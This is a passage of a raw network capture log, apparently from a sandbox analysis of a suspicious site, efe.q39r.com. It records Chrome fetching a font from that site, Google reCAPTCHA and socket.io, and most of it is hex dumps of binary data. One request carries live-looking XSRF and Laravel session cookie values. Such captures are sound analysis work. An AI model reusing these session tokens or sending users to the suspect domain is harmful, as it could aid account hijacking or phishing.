                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 34 0b 2d ab af a9 57 67 f7 51 bd 61 37 69 bc 69 4b 76 78 bf 58 39 1e 64 1d 8e 2d 52 6f f1 43 6b ea a6 58 f8 13 68 45 70 b2 db 5a 4d d1 66 ac 0c bc b8 74 db ad f6 4c df 84 10 7c 9b 9c ea 48 0d 9c 0e 4c d5 de a5 81 a8 4e 91 7e be 3d c8 de d1 df a1 59 98 3a 2d 47 0e ae f9 33 c0 16 17 db ed 6f c8 04 34 b3 31 0a 82 b1 49 41 13 32 21 98 26 40 6b 46 10 cc 4d d0 02 82 65 02 75 ad 08 82 b5 09 da 40 b0 4d 80 d2 8e 20 d8 9b a0 03 04 c7 04 5a 3a 11 04 67 13 74 81 e0 9a 40 43 37 82 e0 6e 82 1e 90 ef 09 85 af e3 7e 79 b3 a8 3c 1f af a3 ea b7 59 3a 65 d4 f0 e9 2e 26 f6 67 88 bf 3c 17 fe 4a 7d 86 6f b3 d4 df 1f 89 7f d8 c2 3f 29 f0 6b 96 fb f7 23 f1 1f 5b f8 2f 05 29 b5 c1 3b 3f f9 d3 9d 6f 74 4d 92 6e c1 9b 60 e7 5b 3f ce 93 de be b6 0e 52 ab 33 bf 5e c8 c7 d5 43 95 3d
                                                                                  Data Ascii: 4-WgQa7iiKvxX9d-RoCkXhEpZMftL|HLN~=Y:-G3o41IA2!&@kFMeu@M Z:gt@C7n~y<Y:e.&g<J}o?)k#[/);?otMn`[?R3^C=
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 9e c9 86 8a fb 19 1b 9a 4e 20 d9 ad ef 8f d4 83 74 ce bb a7 2e 77 88 ac c3 8d 0f b2 51 bb 08 c0 b8 d9 ad 54 c6 3f f5 45 b6 35 f7 cb 1c cb 38 c1 a2 9a 9b bb 68 e1 2e a8 d4 0d b2 c4 ad c9 e2 ab a1 8d df 65 cf 1b 09 af e5 6d 50 2f b2 bc d5 91 41 8b 0c 3c 2c db 32 2a a4 e0 28 ad 42 06 2b ca c1 98 40 6d ea 72 b4 be d5 41 a6 7d 2b 6b 37 24 85 3a 61 fd 7c 04 75 c4 5f a6 e5 5d 66 a6 df a4 f5 e8 28 89 3d ab 0b 0c 6c b4 d2 a8 77 7e 3e 40 5f 74 8d 57 30 00 c5 e8 bd 8c fd d4 dc ad 43 5d 93 64 52 3e 47 47 5e f4 3b 0c 17 af f2 bd 11 03 7d e5 8b 1d 0d ae ad 1d c8 4c ce ae 60 97 20 5d 60 73 e9 4d 28 9e fa 17 4a 14 06 9a f3 51 58 d3 87 f7 f0 6a a7 e7 02 f1 7c a6 6b c0 5a 9c a6 71 a7 6d 77 5c a5 e4 ea 23 ea 5a 6c 9c d5 7a 09 7f 9a b1 87 11 03 90 28 34 e5 6a cc db 32 a1 cc
                                                                                  Data Ascii: N t.wQT?E58h.emP/A<,2*(B+@mrA}+k7$:a|u_]f(=lw~>@_tW0C]dR>GG^;}L` ]`sM(JQXj|kZqmw\#Zlz(4j2
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: e8 b0 43 69 8b 41 c0 80 54 b8 1b 3b bc 73 32 24 3c dc a9 94 c8 fd c4 62 cb 69 1a e0 6f 82 ae 79 55 71 5b e8 20 f7 e1 10 fc 2e 89 29 19 ad 45 f6 10 16 12 7c 7b a9 ae e7 89 03 39 7c 32 4f 25 b8 b1 a6 79 4b 84 ec 81 38 13 20 4f dd db 92 0a 82 ab 02 5f f7 76 1d b5 70 ff 5a 4b 61 e9 9a f0 b4 c9 a7 65 19 99 eb d2 ff cc 5a 1d d5 ad 3d a9 dc d7 3f d7 04 87 47 ae d8 83 2a ec 4b 7a 32 cf 40 de 17 24 b5 27 3d fc 70 e1 7d f8 26 a9 fd b4 70 3c ba 84 97 64 67 4b 73 47 73 22 75 e1 a6 a3 95 79 c9 7d 3a f9 6e a4 ea 9e bf 47 78 1c db ef 7d 70 0e 4a d9 66 b0 6f fb 0a db de d6 5b 5f a7 6d 6d aa e6 3b 4c 81 04 ba 0d be 91 ce 1f e7 b8 cc ce 72 36 ce 9f f8 4b 3e f6 63 d0 39 da 99 e1 24 58 ef ad ce 1d 15 87 68 95 9d 29 d7 2d 75 09 b7 74 bd 2b 99 86 a9 ef 3b 52 06 06 93 98 67 80
                                                                                  Data Ascii: CiAT;s2$<bioyUq[ .)E|{9|2O%yK8 O_vpZKaeZ=?G*Kz2@$'=p}&p<dgKsGs"uy}:nGx}pJfo[_mm;Lr6K>c9$Xh)-ut+;Rg


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.1749747172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:32 UTC1415OUTGET /23Y1SlAfZUj5ab3gLTPxy70 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Origin: https://efe.q39r.com
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: font
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:33 UTC617INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:33 GMT
                                                                                  Content-Type: font/woff
                                                                                  Content-Length: 36696
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="23Y1SlAfZUj5ab3gLTPxy70"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BMh1T0%2FRZfzuPMkB8PlJw3xcW0BlIgLZbKUZKRZyYWAgSTi9vexxDi9OV7Axuj7cnyCt2P%2BdVQTNj2WUlojACmCq16Ofxrcq%2FmZVWJatDtoQ0M7Ud9O8an5vTccKTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada01e5a53f9-ATL
                                                                                  2024-04-25 16:23:33 UTC752INData Raw: 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00 00 76 d0 00 00 00
                                                                                  Data Ascii: wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hheav
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 4d a7 b7 68 2e cd a3 c5 b4 94 96 51 21 7d 42 c5 b4 9a d6 51 09 6d a4 4d b4 85 b6 52 1d 35 2a bf 4a 55 69 2a a8 f2 55 5f 35 40 5d ae ae 50 57 aa 81 ea 2a 35 48 0d 56 57 ab 6b d4 b5 ea 3a 35 44 5d af 6e 50 23 d4 18 35 56 3d a9 c6 a9 a7 d4 78 f5 b4 9a a0 9e 57 2f a8 89 ea 45 35 49 bd 04 8a 4e 56 53 d4 54 d0 75 ba 9a a1 5e 55 33 d5 5f d4 1b ea 6d 35 47 2d 50 8b d5 12 55 a8 8a d4 47 6a 95 2a 56 ab d5 a7 6a 8d 5a ab d6 a9 f5 6a a3 da 42 4a bd ca 5f 50 77 ca e3 30 f5 e2 66 2a 00 8f 96 71 13 95 f0 71 35 96 f7 aa 27 b9 46 3d 4d 49 6a 02 37 a8 e7 91 5e e0 66 f5 22 87 d5 4b 5c a1 a6 70 48 4d 43 de 74 a4 57 b9 5a cd 42 7a 9d eb d5 6c 94 2b c6 b3 b5 d4 85 ce 01 65 7c a0 8d 0f b5 1e a5 42 3e 8e 9a 0f a9 31 a8 61 2c f5 44 ed 45 6a 1c e5 a8 a7 28 a8 c6 93 4f 3d cd 95 68
                                                                                  Data Ascii: Mh.Q!}BQmMR5*JUi*U_5@]PW*5HVWk:5D]nP#5V=xW/E5INVSTu^U3_m5G-PUGj*VjZjBJ_Pw0f*qq5'F=MIj7^f"K\pHMCtWZBzl+e|B>1a,DEj(O=h
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 4f d6 e1 0d 70 0b f4 8a e0 9c a5 69 07 3a 1f c1 db c9 f0 f2 79 f0 13 cb e0 fb fc c6 27 ed b7 bd 3d ac 5d 21 b0 b3 ad 2e f0 04 b6 61 ad 5b 68 b9 10 b6 63 0c 3c e1 58 d8 86 27 79 35 f4 ca 6f ac ef 26 d1 a5 c9 90 86 a9 90 f9 69 22 b5 b0 ba d0 e2 57 91 3f 13 16 73 16 f2 6d 3b a2 71 98 0b 1d 50 b6 05 84 34 c3 fa 42 92 0b d0 aa e6 6b 37 48 d4 71 d4 7f 5c fc e1 04 d0 60 32 d2 62 78 80 25 48 ef 23 2d 43 fa 00 e9 23 3c d7 5a b0 1a e9 53 d4 8f 5e 2b 44 95 6a 23 d2 56 cd 69 60 9a 05 8c 2c 48 45 12 da 1b 83 de 2a b5 1c 12 aa 5c 49 a8 43 cf ab 5d 39 3a 6c ee 2c 91 23 94 c2 73 4d 5d 0b 3c b2 0c 7d d2 9d a7 f0 54 bd 78 ab a3 2d 42 73 e5 bc c7 db 28 69 e8 49 1d e1 0e 9b 78 fb 40 7a 88 ee 43 9c 7c 14 3c 48 e2 30 b0 b0 50 3e 85 9b 00 90 39 66 ae e7 1a 5c eb d4 44 1d f2 e0
                                                                                  Data Ascii: Opi:y'=]!.a[hc<X'y5o&i"W?sm;qP4Bk7Hq\`2bx%H#-C#<ZS^+Dj#Vi`,HE*\IC]9:l,#sM]<}Tx-Bs(iIx@zC|<H0P>9f\D
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 23 ce b8 34 d4 96 47 4a c0 1c 9f 8f df e5 cd bc 08 e7 46 48 4a 19 62 c7 32 7b 4d 8f 27 ea 39 53 c8 f9 2e c8 fb 5e f8 a8 23 b2 9f 23 cc ab 0d ae 13 e5 b7 02 b1 e4 5e f3 64 25 c6 59 47 79 27 57 f2 6b bc 9d 17 71 0d 4a ef 32 29 64 e6 07 fd c8 0d f3 6c fe 2b ea 6c d0 ad f1 3a ea 09 3a e4 f0 74 68 df f6 d3 90 93 1a b3 57 63 bf f6 a8 68 37 cc 27 a1 a7 e9 68 b5 0a d7 0d 7a 3f a4 94 39 89 9e 85 1d 49 32 eb 54 3a bf 41 ae cc 6c 1f 3c b0 de 37 67 8f 01 8f 00 b7 9a d8 75 4d ae b4 25 0e 6d c9 3b f6 1e 10 a1 d8 5e b4 54 8d f4 85 ec 5f 3c c5 11 ab 67 ec 5a a7 77 cc a0 be 2e da da c8 b5 a6 d6 49 b3 93 c6 2e d5 d8 b6 7c b8 e5 6a 65 1e 2d 26 9e 73 c6 8d ba d7 72 11 33 17 78 ea 78 9b f2 7a bd 63 8f e7 be d6 9e 05 06 7e 56 cb f9 53 af e7 75 f5 d5 9d 99 42 1f ab c8 ec 09 12
                                                                                  Data Ascii: #4GJFHJb2{M'9S.^##^d%YGy'WkqJ2)dl+l::thWch7'hz?9I2T:Al<7guM%m;^T_<gZw.I.|je-&sr3xxzc~VSuB
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: e6 31 7c f1 f7 3a b4 90 97 c3 ed 7d 71 d3 6e 84 68 79 ca f8 dc f1 8a 13 b3 46 8f 64 ca 90 57 04 ab fe 26 a2 a8 50 fc 31 a1 ac 4e 26 47 7d ab d2 e0 91 b2 86 88 7e c1 3e ae 8b 79 fb 60 7b 74 8e 13 fd 1f a1 b3 e5 e6 42 d7 57 d7 da bb 7d 81 6b 5b d1 7d 72 64 14 2e ba aa 47 10 8d d1 a3 4d c7 ea d9 76 a6 e5 08 d2 b5 51 8b 62 2d 64 94 25 38 e2 68 b6 89 9d c2 90 ce 46 91 fc d0 e9 7f 67 e7 e0 e8 ac fc 49 8d 8d 1a e2 cf e2 c4 e7 7f 04 5b 89 fb 43 d1 f2 e2 8e f9 8e da 56 c1 9e 6f 30 cf f6 9d de 6c 27 de 0b c0 7b d6 e9 55 03 53 4b 46 dc 79 a3 06 ef de 88 a8 16 bc 71 e4 0e 89 15 da 90 f5 76 e5 3d e8 ed 4d d4 ea 96 2f 6e 44 fe 1c 6c c5 94 f8 6b ab a2 c9 2d f7 76 46 bc 59 93 3b f7 a7 ef 8b f8 9d f6 c6 98 ed e4 57 23 a6 aa 8e b6 ef 90 f6 da d6 77 95 44 d1 53 09 2e cd c6
                                                                                  Data Ascii: 1|:}qnhyFdW&P1N&G}~>y`{tBW}k[}rd.GMvQb-d%8hFgI[CVo0l'{USKFyqv=M/nDlk-vFY;W#wDS.
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: bb 01 8d f1 0f 5c 20 73 e7 f4 80 90 ec 7e 38 f0 a3 56 e0 c7 e8 e3 7d d2 4f 07 7e 26 30 b2 0d b8 df c0 03 2e 8c 72 e1 9b 3a 86 21 ce e9 26 ff 3e ac d3 30 c0 1d f4 8f 92 d2 69 00 75 81 cf f2 23 ea ba 0d 25 6f 13 b8 0c de f1 3c ba 07 d0 03 5e e4 7c ba 40 f4 b7 2b d9 bb f2 f4 57 71 69 64 ff 53 f4 70 99 b5 89 9e 99 f1 fe 4b 90 d6 75 a2 3b 01 57 d2 39 f4 5d fa 07 3a 13 d1 db c5 d0 7f e7 4b e9 db 4c bb 67 9b ef 91 cf d2 91 9c 1c ff 24 a0 b5 74 03 28 ab 50 d3 19 48 fd dd 73 92 b9 b3 ef 75 3a 07 ba da 43 fe 97 ef 7c e8 aa 4f 56 06 94 bc d9 1f cf 73 64 9d f3 76 48 59 7f c1 aa 7f 14 a8 36 41 d7 e4 40 ff 56 a1 ad 12 49 1e 7c e3 bd 13 0b dd 4d fe 39 2e 24 0b f4 68 03 2c 03 29 2e f8 0c e8 9a fc a0 71 2a 24 40 ff 3b e4 b9 b8 d6 2b d1 67 02 ce 36 d7 f9 22 1f bd 21 0d 7d
                                                                                  Data Ascii: \ s~8V}O~&0.r:!&>0iu#%o<^|@+WqidSpKu;W9]:KLg$t(PHsu:C|OVsdvHY6A@VI|M9.$h,).q*$@;+g6"!}
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 21 b9 6e ac 3b c1 9d ee 2e 76 33 dc 15 ee 2a 77 83 bb d9 dd e7 1e 74 0b dd d3 5e 4d af 8e e7 7a 3e 2f ca 6b e9 75 f0 62 bc a5 de 0a 2f cb cb f6 d6 45 d6 8a f4 45 46 45 4e 8b 4c f6 39 be 70 5f 15 5f 75 5f 1d 9f eb 6b e6 eb e2 8b f3 3d d4 78 7b d0 09 56 fc 65 d3 59 e7 6c 68 71 b1 e9 f3 68 41 07 6e a4 2f 03 4c d7 60 46 90 ca 72 b2 58 c3 7a b9 a6 2b cf 74 fd a0 33 4e 44 a9 ae 2d 4e 41 a9 ae 18 37 d1 9d e6 2e 74 d3 dd e5 6e 96 9b e3 e6 b9 7b dc 7c f7 47 f7 94 57 c3 8b f0 ea 79 9e e9 6a e1 b5 2f d7 b5 f2 5f 75 55 fb 8b ae 81 a6 8b 60 a8 e9 52 99 2e 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab fc
                                                                                  Data Ascii: !n;.v3*wt^Mz>/kub/EEFENL9p__u_k=x{VeYlhqhAn/L`FrXz+t3ND-NA7.tn{|GWyj/_uU`R.MM/X:Q+T"#Pc~2c?uIs
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 63 dd ad 18 fe a6 ff 2f f7 e0 48 1c b2 5f b8 86 07 10 29 77 0d 94 bb da 56 ae 12 b2 a3 52 05 42 25 2a c4 14 33 04 30 9f 14 5e 4b 90 15 6a 35 2d 17 f1 e9 d1 c8 8c 10 b7 07 f7 7c d3 af d8 6b dd ed c3 7e 30 12 fb 17 34 1b 0d 60 54 b1 df fa a9 f5 63 20 86 c1 4c 3a c3 70 bf e7 87 a0 95 ae a4 74 86 83 52 38 d4 c4 23 96 f5 2c c3 50 ba 17 53 ce 30 ae 2e 00 50 aa d5 6a 85 52 1b 8f 90 9e d5 b1 7a a4 65 75 f8 2d ac bd b6 ce 7a b1 ff 71 ec 9f 37 82 ee f0 43 77 d6 a3 32 e1 06 3f f4 99 35 07 ca 67 99 f7 a1 fc 9d 50 be 0f 13 ca c4 30 53 2d d9 2e 88 c7 84 7e cc 00 53 f9 46 86 65 09 e9 8c 67 99 12 71 1c e1 0e f2 42 e5 e1 61 be 9a 68 7d 58 4c 78 4c 48 90 26 d4 37 34 31 42 05 cd d2 e8 52 c3 b0 9f af 42 e9 ef ef e7 eb 89 f5 3a 94 9a 87 d3 d3 62 f4 3a 35 4a cd 10 7f 79 1f bd
                                                                                  Data Ascii: c/H_)wVRB%*30^Kj5-|k~04`Tc L:ptR8#,PS0.PjRzeu-zq7Cw2?5gP0S-.~SFegqBah}XLxLH&741BRB:b:5Jy
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 5b 6e 74 ff e5 22 3a 74 e6 cc b9 53 7f e5 87 cc 6d c7 17 37 9e 58 9a 61 3d 8f bf da d6 df b7 4b 50 42 bd 3d a3 67 f9 eb c0 1f 2d 93 c4 58 2c 53 c3 42 43 82 7d 78 cc fa 69 c0 20 c0 a5 be 64 0a 9e 9c 65 81 01 88 31 44 07 24 05 26 01 cb b4 48 3b 39 cb 94 5a a5 81 b0 2d c3 6c 30 6b 33 32 c6 f1 0e d9 78 46 3e e7 ce fa d1 f2 57 cb 5e e9 9d 37 9c fe 79 f7 27 e9 a9 c0 3b 67 3c 3c 26 dc 5d f2 a3 e6 57 cd 53 8f 19 a3 3f 6f fc a4 ec ad c9 78 79 1f 9d 93 83 99 54 4b 12 0b 76 02 99 91 c5 a9 bf 11 b4 36 5b cb d8 4d ff be 9a a0 00 4d b0 6f b0 4e 3d cd 57 09 52 85 60 06 06 51 8d 8c 84 e9 16 f4 06 30 58 9e 7d b9 85 f7 df 83 ba 5f 10 1e 67 15 ac 70 e7 22 7a b2 f3 d1 f5 d3 05 c3 d1 fb ce 1f 12 04 f6 ee ee 1f c5 58 d7 e3 55 d6 fd c0 ec a5 87 85 c7 b6 f6 f6 0e 0a be 54 a6 67
                                                                                  Data Ascii: [nt":tSm7Xa=KPB=g-X,SBC}xi de1D$&H;9Z-l0k32xF>W^7y';g<<&]WS?oxyTKv6[MMoN=WR`Q0X}_gp"zXUTg
                                                                                  2024-04-25 16:23:33 UTC474INData Raw: 66 58 28 56 91 e1 64 93 29 7b 49 42 60 ed 03 9f cb 18 22 48 2e 36 7a 83 03 35 3e 6a 6f 2f 4f 0f 91 68 05 13 81 22 5c c7 a8 b6 1b 5a 7e 9e ec 18 e9 ec db 4d dd c5 79 d6 39 63 8e 50 de 92 69 ba a9 29 09 85 41 a5 86 35 c2 9c ee ea a2 0d 46 69 bc 85 9e 62 63 a7 96 c5 98 32 8d fa e9 a6 3c 42 73 99 50 85 5d e8 fc 01 d6 90 c6 c7 45 c1 51 25 20 cf 23 ac 8d 3a 6f 4f e0 23 cc 22 dc 18 45 30 7d 8c e3 61 54 6b 6f 99 e5 62 75 53 ae 29 61 46 48 99 b1 47 a8 5a 59 5b d6 17 45 d8 15 d2 5b 98 91 13 6d 98 9e 99 4d e6 2c a1 8a ce 59 09 c4 8f 57 20 c4 c6 c5 42 3f e2 52 e2 72 d2 99 8f 8e 3e 6d 19 58 10 76 dd 69 88 0e 0c f0 d3 78 7b b9 2a 99 04 94 60 d7 9d 64 90 39 ce 6a 0a a5 82 fc df 8e 4b 47 9b 7b e3 a6 f8 4f 09 1c 20 73 dd fd cf ff e0 dc c5 92 32 5d 71 74 62 a6 25 2d c1 12
                                                                                  Data Ascii: fX(Vd){IB`"H.6z5>jo/Oh"\Z~My9cPi)A5Fibc2<BsP]EQ% #:oO#"E0}aTkobuS)aFHGZY[E[mM,YW B?Rr>mXvix{*`d9jKG{O s2]qtb%-


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.174975264.233.177.1034435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:33 UTC711OUTGET /recaptcha/api.js HTTP/1.1
                                                                                  Host: www.google.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlKHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://efe.q39r.com/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:33 UTC528INHTTP/1.1 200 OK
                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                  Expires: Thu, 25 Apr 2024 16:23:33 GMT
                                                                                  Date: Thu, 25 Apr 2024 16:23:33 GMT
                                                                                  Cache-Control: private, max-age=300
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Content-Security-Policy: frame-ancestors 'self'
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Server: GSE
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Accept-Ranges: none
                                                                                  Vary: Accept-Encoding
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  2024-04-25 16:23:33 UTC727INData Raw: 34 63 36 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                  Data Ascii: 4c6/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                  2024-04-25 16:23:33 UTC502INData Raw: 63 47 6c 79 65 53 49 36 4d 54 63 79 4e 54 51 77 4e 7a 6b 35 4f 53 77 69 61 58 4e 54 64 57 4a 6b 62 32 31 68 61 57 34 69 4f 6e 52 79 64 57 55 73 49 6d 6c 7a 56 47 68 70 63 6d 52 51 59 58 4a 30 65 53 49 36 64 48 4a 31 5a 58 30 3d 27 3b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 70 6f 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 56 36 5f 38 35 71 70 63 32 58 66 32 73 62 65 33 78 54 6e 52 74 65 37 6d 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 3b 70 6f 2e 63 72 6f 73 73 4f 72 69 67 69 6e 3d 27 61 6e 6f 6e 79 6d 6f 75 73 27 3b 70 6f 2e 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 30 6c 4a 6b 4f 56 48 44 79 33 49 74 59 6c 43 62 55
                                                                                  Data Ascii: cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-0lJkOVHDy3ItYlCbU
                                                                                  2024-04-25 16:23:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.1749751108.156.152.1144435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:33 UTC619OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                                                                                  Host: cdn.socket.io
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Referer: https://efe.q39r.com/
                                                                                  Accept-Encoding: gzip, deflate, br
